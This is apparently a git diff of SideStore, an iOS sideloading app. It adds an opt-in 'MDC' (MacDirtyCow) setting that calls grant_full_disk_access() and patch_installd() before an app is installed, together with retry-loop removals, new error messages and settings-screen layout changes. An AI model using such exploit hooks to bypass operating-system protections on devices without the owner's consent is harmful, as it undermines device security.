                     //App ID name must be ascii. If the name is not ascii, using bundleID instead

AltStore/Operations/InstallAppOperation.swift

@@ -12,6 +12,9 @@ import AltStoreCore
 import AltSign
 import Roxas
 import minimuxer
+#if MACDIRTYCOW
+import MacDirtyCow
+#endif
 
 @objc(InstallAppOperation)
 final class InstallAppOperation: ResultOperation<InstalledApp>
@@ -41,12 +44,14 @@ final class InstallAppOperation: ResultOperation<InstalledApp>
         
         guard
             let certificate = self.context.certificate,
-            let resignedApp = self.context.resignedApp
+            let resignedApp = self.context.resignedApp,
+            let provisioningProfiles = self.context.provisioningProfiles
         else { return self.finish(.failure(OperationError.invalidParameters)) }
         
         let backgroundContext = DatabaseManager.shared.persistentContainer.newBackgroundContext()
         backgroundContext.perform {
             
+            
             /* App */
             let installedApp: InstalledApp
             
@@ -116,8 +121,7 @@ final class InstallAppOperation: ResultOperation<InstalledApp>
             // Temporary directory and resigned .ipa no longer needed, so delete them now to ensure AltStore doesn't quit before we get the chance to.
             self.cleanUp()
             
-            var activeProfiles: Set<String>?
-            if let sideloadedAppsLimit = UserDefaults.standard.activeAppsLimit
+            if let sideloadedAppsLimit = UserDefaults.standard.activeAppsLimit, provisioningProfiles.contains(where: { $1.isFreeProvisioningProfile == true })
             {
                 // When installing these new profiles, AltServer will remove all non-active profiles to ensure we remain under limit.
                 
@@ -142,11 +146,10 @@ final class InstallAppOperation: ResultOperation<InstalledApp>
                         installedApp.isActive = false
                     }
                 }
-
-                activeProfiles = Set(activeApps.flatMap { (installedApp) -> [String] in
-                    let appExtensionProfiles = installedApp.appExtensions.map { $0.resignedBundleIdentifier }
-                    return [installedApp.resignedBundleIdentifier] + appExtensionProfiles
-                })
+            }
+            else
+            {
+                installedApp.isActive = true
             }
             
             var installing = true
@@ -200,10 +203,42 @@ final class InstallAppOperation: ResultOperation<InstalledApp>
             }
             
             do {
+                #if MACDIRTYCOW
+                if UserDefaults.standard.isMDCEnabled {
+                    grant_full_disk_access { error in
+                        if error != nil {
+                            self.finish(.failure(OperationError.mdcExploitFailed))
+                            return
+                        }
+                        if !patch_installd() {
+                            self.finish(.failure(OperationError.mdcExploitFailed))
+                            return
+                        }
+                        
+                        do
+                        {
+                            try install_ipa(installedApp.bundleIdentifier)
+                            installing = false
+                            installedApp.refreshedDate = Date()
+                            self.finish(.success(installedApp))
+                        } catch let error {
+                            installing = false
+                            self.finish(.failure(error))
+                        }
+                    }
+                }
+                else {
+                    try install_ipa(installedApp.bundleIdentifier)
+                    installing = false
+                    installedApp.refreshedDate = Date()
+                    self.finish(.success(installedApp))
+                }
+                #else
                 try install_ipa(installedApp.bundleIdentifier)
                 installing = false
                 installedApp.refreshedDate = Date()
                 self.finish(.success(installedApp))
+                #endif
             } catch let error {
                 installing = false
                 self.finish(.failure(error))

AltStore/Operations/OperationError.swift

@@ -34,10 +34,16 @@ enum OperationError: LocalizedError
     case openAppFailed(name: String)
     case missingAppGroup
     
+    case noWiFi
+    case tooNewError
     case anisetteV1Error(message: String)
     case provisioningError(result: String, message: String?)
     case anisetteV3Error(message: String)
     
+    case mdcExploitFailed
+    
+    case cacheClearError(errors: [String])
+    
     var failureReason: String? {
         switch self {
         case .unknown: return NSLocalizedString("An unknown error occured.", comment: "")
@@ -53,9 +59,13 @@ enum OperationError: LocalizedError
         case .openAppFailed(let name): return String(format: NSLocalizedString("SideStore was denied permission to launch %@.", comment: ""), name)
         case .missingAppGroup: return NSLocalizedString("SideStore's shared app group could not be found.", comment: "")
         case .maximumAppIDLimitReached: return NSLocalizedString("Cannot register more than 10 App IDs.", comment: "")
+        case .noWiFi: return NSLocalizedString("You do not appear to be connected to WiFi!\nSideStore will never be able to install or refresh applications without WiFi.", comment: "")
+        case .tooNewError: return NSLocalizedString("iOS 17 has changed how JIT is enabled therefore SideStore cannot enable it at this time, sorry for any inconvenience.\nWe will let everyone know once we have a solution!", comment: "")
         case .anisetteV1Error(let message): return String(format: NSLocalizedString("An error occurred when getting anisette data from a V1 server: %@. Try using another anisette server.", comment: ""), message)
         case .provisioningError(let result, let message): return String(format: NSLocalizedString("An error occurred when provisioning: %@%@. Please try again. If the issue persists, report it on GitHub Issues!", comment: ""), result, message != nil ? (" (" + message! + ")") : "")
         case .anisetteV3Error(let message): return String(format: NSLocalizedString("An error occurred when getting anisette data from a V3 server: %@. Please try again. If the issue persists, report it on GitHub Issues!", comment: ""), message)
+        case .mdcExploitFailed: return NSLocalizedString("An error occured while running MDC exploit, try disabling it in settings", comment: "")
+        case .cacheClearError(let errors): return String(format: NSLocalizedString("An error occurred while clearing cache: %@", comment: ""), errors.joined(separator: "\n"))
         }
     }
     

AltStore/Operations/RefreshAppOperation.swift

@@ -41,19 +41,11 @@ final class RefreshAppOperation: ResultOperation<InstalledApp>
             guard let app = self.context.app else { return self.finish(.failure(OperationError.appNotFound)) }
             
             for p in profiles {
-                var attempts = 5
-                while (attempts > 0){
-                    print("Install provisioning profile attempts left: \(attempts)")
-                    do {
-                        let bytes = p.value.data.toRustByteSlice()
-                        try install_provisioning_profile(bytes.forRust())
-                        break
-                    } catch {
-                        attempts -= 1
-                        if (attempts <= 0) {
-                            self.finish(.failure(MinimuxerError.ProfileInstall))
-                        }
-                    }
+                do {
+                    let bytes = p.value.data.toRustByteSlice()
+                    try install_provisioning_profile(bytes.forRust())
+                } catch {
+                    self.finish(.failure(MinimuxerError.ProfileInstall))
                 }
 
                 DatabaseManager.shared.persistentContainer.performBackgroundTask { (context) in

AltStore/Operations/ResignAppOperation.swift

@@ -11,6 +11,7 @@ import Roxas
 
 import AltStoreCore
 import AltSign
+import minimuxer
 
 @objc(ResignAppOperation)
 final class ResignAppOperation: ResultOperation<ALTApplication>
@@ -181,7 +182,7 @@ private extension ResignAppOperation
 
                 if app.isAltStoreApp
                 {
-                    guard let udid = Bundle.main.object(forInfoDictionaryKey: Bundle.Info.deviceID) as? String else { throw OperationError.unknownUDID }
+                    guard let udid = fetch_udid()?.toString() as? String else { throw OperationError.unknownUDID }
                     guard let pairingFileString = Bundle.main.object(forInfoDictionaryKey: Bundle.Info.devicePairingString) as? String else { throw OperationError.unknownUDID }                    
                     additionalValues[Bundle.Info.devicePairingString] = pairingFileString
                     additionalValues[Bundle.Info.deviceID] = udid
@@ -202,7 +203,7 @@ private extension ResignAppOperation
                         // The embedded certificate + certificate identifier are already in app bundle, no need to update them.
                     }
                 }
-                else if infoDictionary.keys.contains(Bundle.Info.deviceID), let udid = Bundle.main.object(forInfoDictionaryKey: Bundle.Info.deviceID) as? String
+                else if infoDictionary.keys.contains(Bundle.Info.deviceID), let udid = fetch_udid()?.toString() as? String
                 {
                     // There is an ALTDeviceID entry, so assume the app is using AltKit and replace it with the device's UDID.
                     additionalValues[Bundle.Info.deviceID] = udid

AltStore/Operations/SendAppOperation.swift

@@ -45,21 +45,13 @@ final class SendAppOperation: ResultOperation<()>
         print("AFC App `fileURL`: \(fileURL.absoluteString)")
         
         if let data = NSData(contentsOf: fileURL) {
-            var attempts = 10
-            while (attempts != 0){
-                print("Send app attempts left: \(attempts)")
-                do {
-                    let bytes = Data(data).toRustByteSlice()
-                    try yeet_app_afc(app.bundleIdentifier, bytes.forRust())
-                    self.progress.completedUnitCount += 1
-                    self.finish(.success(()))
-                    break
-                } catch {
-                    attempts -= 1
-                    if (attempts <= 0) {
-                        self.finish(.failure(MinimuxerError.RwAfc))
-                    }
-                }
+            do {
+                let bytes = Data(data).toRustByteSlice()
+                try yeet_app_afc(app.bundleIdentifier, bytes.forRust())
+                self.progress.completedUnitCount += 1
+                self.finish(.success(()))
+            } catch {
+                self.finish(.failure(MinimuxerError.RwAfc))
                 self.progress.completedUnitCount += 1
                 self.finish(.success(()))
             }

AltStore/Settings/Settings.storyboard

@@ -21,7 +21,7 @@
                         <color key="tintColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                         <color key="separatorColor" white="1" alpha="0.25" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                         <label key="tableFooterView" opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="SideStore 1.0" textAlignment="center" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" id="bUR-rp-Nw2">
-                            <rect key="frame" x="0.0" y="1126" width="375" height="25"/>
+                            <rect key="frame" x="0.0" y="1341" width="375" height="25"/>
                             <autoresizingMask key="autoresizingMask" flexibleMaxX="YES" flexibleMaxY="YES"/>
                             <fontDescription key="fontDescription" type="system" pointSize="17"/>
                             <color key="textColor" white="1" alpha="0.69999999999999996" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
@@ -236,9 +236,45 @@
                                             <userDefinedRuntimeAttribute type="boolean" keyPath="isSelectable" value="NO"/>
                                         </userDefinedRuntimeAttributes>
                                     </tableViewCell>
-                                    <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="amC-sE-8O0" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
+                                    <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="GYp-O0-pse" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
                                         <rect key="frame" x="0.0" y="444" width="375" height="51"/>
                                         <autoresizingMask key="autoresizingMask"/>
+                                        <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="GYp-O0-pse" id="vDG-ZV-xRS">
+                                            <rect key="frame" x="0.0" y="0.0" width="375" height="51"/>
+                                            <autoresizingMask key="autoresizingMask"/>
+                                            <subviews>
+                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Disable Idle Timeout" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="PCh-Up-aJJ">
+                                                    <rect key="frame" x="30" y="15.5" width="166" height="20.5"/>
+                                                    <fontDescription key="fontDescription" type="boldSystem" pointSize="17"/>
+                                                    <color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
+                                                    <nil key="highlightedColor"/>
+                                                </label>
+                                                <switch opaque="NO" contentMode="scaleToFill" horizontalHuggingPriority="750" verticalHuggingPriority="750" contentHorizontalAlignment="center" contentVerticalAlignment="center" on="YES" translatesAutoresizingMaskIntoConstraints="NO" id="iQA-wm-5ag">
+                                                    <rect key="frame" x="296" y="10" width="51" height="31"/>
+                                                    <connections>
+                                                        <action selector="toggleNoIdleTimeoutEnabled:" destination="aMk-Xp-UL8" eventType="valueChanged" id="WSl-Jc-g5J"/>
+                                                    </connections>
+                                                </switch>
+                                            </subviews>
+                                            <constraints>
+                                                <constraint firstAttribute="trailingMargin" secondItem="iQA-wm-5ag" secondAttribute="trailing" id="MJ1-HF-Dln"/>
+                                                <constraint firstItem="PCh-Up-aJJ" firstAttribute="leading" secondItem="vDG-ZV-xRS" secondAttribute="leadingMargin" id="Ocu-jn-RAQ"/>
+                                                <constraint firstItem="iQA-wm-5ag" firstAttribute="centerY" secondItem="vDG-ZV-xRS" secondAttribute="centerY" id="c6W-bN-VAb"/>
+                                                <constraint firstItem="PCh-Up-aJJ" firstAttribute="centerY" secondItem="vDG-ZV-xRS" secondAttribute="centerY" id="mL6-LB-cjn"/>
+                                            </constraints>
+                                        </tableViewCellContentView>
+                                        <color key="backgroundColor" white="1" alpha="0.14999999999999999" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
+                                        <edgeInsets key="layoutMargins" top="8" left="30" bottom="8" right="30"/>
+                                        <userDefinedRuntimeAttributes>
+                                            <userDefinedRuntimeAttribute type="number" keyPath="style">
+                                                <integer key="value" value="2"/>
+                                            </userDefinedRuntimeAttribute>
+                                            <userDefinedRuntimeAttribute type="boolean" keyPath="isSelectable" value="YES"/>
+                                        </userDefinedRuntimeAttributes>
+                                    </tableViewCell>
+                                    <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="amC-sE-8O0" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
+                                        <rect key="frame" x="0.0" y="495" width="375" height="51"/>
+                                        <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="amC-sE-8O0" id="GEO-2e-E4k">
                                             <rect key="frame" x="0.0" y="0.0" width="375" height="51"/>
                                             <autoresizingMask key="autoresizingMask"/>
@@ -269,7 +305,7 @@
                             <tableViewSection headerTitle="" id="eHy-qI-w5w">
                                 <cells>
                                     <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="30h-59-88f" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
-                                        <rect key="frame" x="0.0" y="535" width="375" height="51"/>
+                                        <rect key="frame" x="0.0" y="586" width="375" height="51"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="30h-59-88f" id="7qD-DW-Jls">
                                             <rect key="frame" x="0.0" y="0.0" width="375" height="51"/>
@@ -309,28 +345,28 @@
                             <tableViewSection headerTitle="" id="J90-vn-u2O">
                                 <cells>
                                     <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="i4T-2q-jF3" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
-                                        <rect key="frame" x="0.0" y="626" width="375" height="51"/>
+                                        <rect key="frame" x="0.0" y="677" width="375" height="51"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="i4T-2q-jF3" id="VTQ-H4-aCM">
                                             <rect key="frame" x="0.0" y="0.0" width="375" height="51"/>
                                             <autoresizingMask key="autoresizingMask"/>
                                             <subviews>
-                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Developers" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="hRA-OK-Vjw">
+                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" text="Developers" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="hRA-OK-Vjw">
                                                     <rect key="frame" x="30" y="15.5" width="86" height="20.5"/>
                                                     <fontDescription key="fontDescription" type="system" pointSize="17"/>
                                                     <color key="textColor" white="1" alpha="0.80000000000000004" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                                     <nil key="highlightedColor"/>
                                                 </label>
-                                                <stackView opaque="NO" contentMode="scaleToFill" spacing="14" translatesAutoresizingMaskIntoConstraints="NO" id="lx9-35-OSk">
+                                                <stackView opaque="NO" contentMode="scaleToFill" ambiguous="YES" spacing="14" translatesAutoresizingMaskIntoConstraints="NO" id="lx9-35-OSk">
                                                     <rect key="frame" x="187.5" y="15.5" width="157.5" height="20.5"/>
                                                     <subviews>
-                                                        <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="SideStore Team" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="JAA-iZ-VGb">
+                                                        <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" text="SideStore Team" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="JAA-iZ-VGb">
                                                             <rect key="frame" x="0.0" y="0.0" width="125.5" height="20.5"/>
                                                             <fontDescription key="fontDescription" type="system" weight="semibold" pointSize="17"/>
                                                             <color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                                             <nil key="highlightedColor"/>
                                                         </label>
-                                                        <imageView clipsSubviews="YES" userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" image="Next" translatesAutoresizingMaskIntoConstraints="NO" id="Mmj-3V-fTb">
+                                                        <imageView clipsSubviews="YES" userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" image="Next" translatesAutoresizingMaskIntoConstraints="NO" id="Mmj-3V-fTb">
                                                             <rect key="frame" x="139.5" y="0.0" width="18" height="20.5"/>
                                                         </imageView>
                                                     </subviews>
@@ -353,28 +389,28 @@
                                         </userDefinedRuntimeAttributes>
                                     </tableViewCell>
                                     <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="oHX-oR-nwJ" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
-                                        <rect key="frame" x="0.0" y="677" width="375" height="51"/>
+                                        <rect key="frame" x="0.0" y="728" width="375" height="51"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="oHX-oR-nwJ" id="hN4-i5-igu">
                                             <rect key="frame" x="0.0" y="0.0" width="375" height="51"/>
                                             <autoresizingMask key="autoresizingMask"/>
                                             <subviews>
-                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" text="UI Designer" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="oqY-wY-1Vf">
+                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="UI Designer" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="oqY-wY-1Vf">
                                                     <rect key="frame" x="30" y="15.5" width="89" height="20.5"/>
                                                     <fontDescription key="fontDescription" type="system" pointSize="17"/>
                                                     <color key="textColor" white="1" alpha="0.80000000000000004" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                                     <nil key="highlightedColor"/>
                                                 </label>
-                                                <stackView opaque="NO" contentMode="scaleToFill" ambiguous="YES" spacing="14" translatesAutoresizingMaskIntoConstraints="NO" id="gUq-6Q-t5X">
+                                                <stackView opaque="NO" contentMode="scaleToFill" spacing="14" translatesAutoresizingMaskIntoConstraints="NO" id="gUq-6Q-t5X">
                                                     <rect key="frame" x="198" y="15.5" width="147" height="20.5"/>
                                                     <subviews>
-                                                        <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" text="Fabian (thdev)" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="ylE-VL-7Fq">
+                                                        <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Fabian (thdev)" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="ylE-VL-7Fq">
                                                             <rect key="frame" x="0.0" y="0.0" width="115" height="20.5"/>
                                                             <fontDescription key="fontDescription" type="system" weight="semibold" pointSize="17"/>
                                                             <color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                                             <nil key="highlightedColor"/>
                                                         </label>
-                                                        <imageView clipsSubviews="YES" userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" image="Next" translatesAutoresizingMaskIntoConstraints="NO" id="e3L-vR-Jae">
+                                                        <imageView clipsSubviews="YES" userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" image="Next" translatesAutoresizingMaskIntoConstraints="NO" id="e3L-vR-Jae">
                                                             <rect key="frame" x="129" y="0.0" width="18" height="20.5"/>
                                                         </imageView>
                                                     </subviews>
@@ -397,28 +433,28 @@
                                         </userDefinedRuntimeAttributes>
                                     </tableViewCell>
                                     <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="0MT-ht-Sit" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
-                                        <rect key="frame" x="0.0" y="728" width="375" height="51"/>
+                                        <rect key="frame" x="0.0" y="779" width="375" height="51"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="0MT-ht-Sit" id="OZp-WM-5H7">
                                             <rect key="frame" x="0.0" y="0.0" width="375" height="51"/>
                                             <autoresizingMask key="autoresizingMask"/>
                                             <subviews>
-                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" text="Asset Designer" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="fGU-Fp-XgM">
+                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Asset Designer" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="fGU-Fp-XgM">
                                                     <rect key="frame" x="30" y="15.5" width="115.5" height="20.5"/>
                                                     <fontDescription key="fontDescription" type="system" pointSize="17"/>
                                                     <color key="textColor" white="1" alpha="0.80000000000000004" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                                     <nil key="highlightedColor"/>
                                                 </label>
-                                                <stackView opaque="NO" contentMode="scaleToFill" ambiguous="YES" spacing="14" translatesAutoresizingMaskIntoConstraints="NO" id="R8B-DW-7mY">
+                                                <stackView opaque="NO" contentMode="scaleToFill" spacing="14" translatesAutoresizingMaskIntoConstraints="NO" id="R8B-DW-7mY">
                                                     <rect key="frame" x="206" y="15.5" width="139" height="20.5"/>
                                                     <subviews>
-                                                        <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" text="Chris (LitRitt)" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="hId-3P-41T">
+                                                        <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Chris (LitRitt)" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="hId-3P-41T">
                                                             <rect key="frame" x="0.0" y="0.0" width="107" height="20.5"/>
                                                             <fontDescription key="fontDescription" type="system" weight="semibold" pointSize="17"/>
                                                             <color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                                             <nil key="highlightedColor"/>
                                                         </label>
-                                                        <imageView clipsSubviews="YES" userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" image="Next" translatesAutoresizingMaskIntoConstraints="NO" id="baq-cE-fMY">
+                                                        <imageView clipsSubviews="YES" userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" image="Next" translatesAutoresizingMaskIntoConstraints="NO" id="baq-cE-fMY">
                                                             <rect key="frame" x="121" y="0.0" width="18" height="20.5"/>
                                                         </imageView>
                                                     </subviews>
@@ -441,19 +477,19 @@
                                         </userDefinedRuntimeAttributes>
                                     </tableViewCell>
                                     <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="O5R-Al-lGj" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
-                                        <rect key="frame" x="0.0" y="779" width="375" height="51"/>
+                                        <rect key="frame" x="0.0" y="830" width="375" height="51"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="O5R-Al-lGj" id="CrG-Mr-xQq">
                                             <rect key="frame" x="0.0" y="0.0" width="375" height="51"/>
                                             <autoresizingMask key="autoresizingMask"/>
                                             <subviews>
-                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" text="Licenses" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="D6b-cd-pVK">
+                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Licenses" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="D6b-cd-pVK">
                                                     <rect key="frame" x="30" y="15.5" width="67.5" height="20.5"/>
                                                     <fontDescription key="fontDescription" type="system" pointSize="17"/>
                                                     <color key="textColor" white="1" alpha="0.80000000000000004" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                                     <nil key="highlightedColor"/>
                                                 </label>
-                                                <imageView clipsSubviews="YES" userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" image="Next" translatesAutoresizingMaskIntoConstraints="NO" id="s79-GQ-khr">
+                                                <imageView clipsSubviews="YES" userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" image="Next" translatesAutoresizingMaskIntoConstraints="NO" id="s79-GQ-khr">
                                                     <rect key="frame" x="327" y="16.5" width="18" height="18"/>
                                                 </imageView>
                                             </subviews>
@@ -478,22 +514,62 @@
                                     </tableViewCell>
                                 </cells>
                             </tableViewSection>
+                            <tableViewSection id="y49-Tc-odS">
+                                <cells>
+                                    <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="DqL-lJ-MhM" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
+                                        <rect key="frame" x="0.0" y="917" width="375" height="51"/>
+                                        <autoresizingMask key="autoresizingMask"/>
+                                        <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="DqL-lJ-MhM" id="KhD-Gc-Ehv">
+                                            <rect key="frame" x="0.0" y="0.0" width="375" height="51"/>
+                                            <autoresizingMask key="autoresizingMask"/>
+                                            <subviews>
+                                                <switch opaque="NO" contentMode="scaleToFill" horizontalHuggingPriority="750" verticalHuggingPriority="750" contentHorizontalAlignment="center" contentVerticalAlignment="center" on="YES" translatesAutoresizingMaskIntoConstraints="NO" id="6NJ-PB-6Jz">
+                                                    <rect key="frame" x="296" y="10" width="51" height="31"/>
+                                                    <connections>
+                                                        <action selector="toggleMDCEnabled:" destination="aMk-Xp-UL8" eventType="valueChanged" id="9rd-cM-Yb1"/>
+                                                    </connections>
+                                                </switch>
+                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Enable MDC" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="kux-ac-Ujm">
